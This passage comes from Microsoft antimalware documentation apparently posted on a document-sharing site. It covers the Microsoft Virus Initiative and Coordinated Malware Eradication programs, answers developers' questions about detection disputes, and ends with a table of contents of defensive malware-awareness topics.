questions, contact us for more information.
Microsoft Virus Initiative
The Microsoft Virus Initiative (MVI) helps organizations to get their products working and integrated with
Windows.
MVI members will receive access to Windows APIs (such as those used by Windows Defender Antivirus), and
other technologies including IOAV, AMSI and Cloud Files, malware telemetry and samples, and invitations to
security related events and conferences.
MVI requires members to develop and own antimalware technology and to be present in the antimalware industry
community.
Join MVI
A request for membership is made by an individual as a representative of an organization that develops and
produces antimalware or antivirus technology.
Initial selection criteria
Your organization must meet the following eligibility requirements to qualify for the MVI program:
1. Offer an antimalware or antivirus product that is one of the following:
Your organization's own creation.
Developed by using an SDK (engine and other components) from another MVI Partner company and
your organization adds a custom UI and/or other functionality.
2. Have your own malware research team unless you build a product based on an SDK.
3. Be active and have a positive reputation in the antimalware industry. Your organization is:
Certified through independent testing by an industry standard organization such as ICSA Labs, West
Coast Labs, PCSL IT Consulting Institute, or SKD Labs.
Be active in the antimalware industry. For example, participate in industry conferences, be reviewed in an
industry standard report such as AV Comparatives, OPSWAT or Gartner.
4. Be willing to sign a non-disclosure agreement (NDA) with Microsoft.
5. Be willing to sign a program license agreement.
6. Be willing to adhere to program requirements for antimalware apps. These requirements define the
behavior of antimalware apps necessary to ensure proper interaction with Windows.
7. Submit your app to Microsoft for periodic performance testing.
Apply now
Coordinated Malware Eradication
Coordinated Malware Eradication (CME ) aims to bring organizations in cybersecurity and in other industries
together to change the game against malware. While the cybersecurity industry today is effective at disrupting
malware families through individual efforts, those disruptions rarely lead to eradication since malware authors
quickly adapt their tactics to survive.
CME calls for organizations to pool their tools, information and actions to drive coordinated campaigns against
malware. The ultimate goal is to drive efficient and long lasting results for better protection of our collective
communities, customers, and businesses.
Combining our tools, information, and actions

Diversity of participation across industries and disciplines, extending beyond cybersecurity, makes eradication
campaigns even stronger across the malware lifecycle. For instance, while security vendors, computer emergency
response/readiness teams (CERTs), and Internet service providers (ISPs) can contribute with malware telemetry,
online businesses can identify fraudulent behavior and law enforcement agencies can drive legal action.
In addition to telemetry and analysis data, Microsoft is planning to contribute cloud-based scalable storage and
computing horsepower with the necessary big data analysis tools built-in to these campaigns.
Coordinated campaigns for lasting results

Organizations participating in the CME effort work together to help eradicate selected malware families by
contributing their own telemetry data, expertise, tools, and other resources. These organizations operate under a
campaign umbrella with clearly defined end goals and metrics. Any organization or member can initiate a
campaign and invite others to join it. The members then have the option to accept or decline the invitations they
receive.
Join the effort

Any organization that is involved in cybersecurity and antimalware or interested in fighting cybercrime can
participate in CME campaigns by enrolling in the Virus Information Alliance (VIA) program. It ensures that
everyone agrees to use the information and tools available for campaigns for their intended purpose (that is, the
eradication of malware).
Information for developers
Learn about the common questions we receive from software developers and get other developer resources such
as detection criteria and file submissions.
In this section
TOPIC DESCRIPTION
Software developer FAQ Provides answers to common questions we receive from

software developers.
Developer resources Provides information about how to submit files, detection

criteria, and how to check your software against the latest
Security intelligence and cloud protection from Microsoft.
Software developer FAQ
This page provides answers to common questions we receive from software developers. For general guidance
about submitting malware or incorrectly detected files, read the submission guide.
Does Microsoft accept files for a known list or false-positive prevention

program?
No. We do not accept these requests from software developers. Signing your program's files in a consistent
manner, with a digital certificate issued by a trusted root authority, helps our research team quickly identify the
source of a program and apply previously gained knowledge. In some cases, this might result in your program
being quickly added to the known list or, far less frequently, in adding your digital certificate to a list of trusted
publishers.
How do I dispute the detection of my program?

Submit the file in question as a software developer. Wait until your submission has a final determination.
If you're not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.
Why is Microsoft asking for a copy of my program?

This can help us with our analysis. Participants of the Microsoft Active Protection Service (MAPS ) may
occasionally receive these requests. The requests will stop once our systems have received and processed the file.
Why does Microsoft classify my installer as a software bundler?

It contains instructions to offer a program classified as unwanted software. You can review the criteria we use to
check applications for behaviors that are considered unwanted.
Why is the Windows Firewall blocking my program?

This is not related to Windows Defender Antivirus and other Microsoft antimalware. You can find out more about
Windows Firewall from the Microsoft Developer Network.
Why does the Windows Defender SmartScreen say my program is not

commonly downloaded?
This is not related to Windows Defender Antivirus and other Microsoft antimalware. You can find out more from
the SmartScreen website.
Software developer resources
Concerned about the detection of your software? If you believe that your application or program has been
incorrectly detected by Microsoft security software, submit the relevant files for analysis.
Check out the following resources for information on how to submit and view submissions:
Submit files
View your submissions
Additional resources
Detection criteria
To objectively identify malware and unidentified software, Microsoft applies a set of criteria for evaluating
malicious or potentially harmful code.
Developer questions
Find more guidance about the file submission and detection dispute process in our FAQ for software developers.
Scan your software
Use Windows Defender Antivirus to check your software against the latest Security intelligence and cloud
protection from Microsoft.

Document

Uploaded by

Copyright:

Available Formats

Document

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

Document

Uploaded by

Copyright:

Available Formats

Contents

Keep software up-to-date

Be wary of links and attachments

Watch out for malicious or compromised websites

Don't attach unfamiliar removable drives

Use a non-administrator account

Other safety tips

What to do with a malware infection

How coin miners work

How to protect against coin miners

How exploits and exploit kits work

Figure 1. Example of how exploit kits work

How we name exploits

How to protect against exploits

Figure 1. Comprehensive diagram of fileless malware

Type I: No file activity performed

Type II: Indirect file activity

Type III: Files required to operate

Categorizing fileless threats by infection host

Defeating fileless malware

How macro malware works

How to protect against macro malware

How phishing works

Phishing trends and techniques

Targeted attacks against enterprises

How to protect against phishing attacks

What do I do if I've already been a victim of a phishing scam?

Where to find more information about phishing attacks

How ransomware works

How rootkits work

How to protect against rootkits

How supply chain attacks work

How to protect against supply chain attacks

How tech support scams work

How to protect against tech support scams

What to do if information has been given to a tech support person

How trojans work

How to protect against trojans

How unwanted software works

How to protect against unwanted software

How worms work

How do I send a malware file to Microsoft?

Can I send a sample by email?

Can I submit a sample without signing in?

What is the Software Assurance ID (SAID)?

How do I track or view past sample submissions?

How does Microsoft prioritize submissions

How to run a scan

Endpoint detection & response

Next generation protection

AV -Comparatives: Protection rating of 99.6% in the latest test

To what extent are tests representative of protection in the real world?

Virus Information Alliance (VIA)

Microsoft Virus Initiative (MVI)

Coordinated Malware Eradication (CME)

Better protection for customers against malware

Becoming a member of VIA

Combining our tools, information, and actions

Coordinated campaigns for lasting results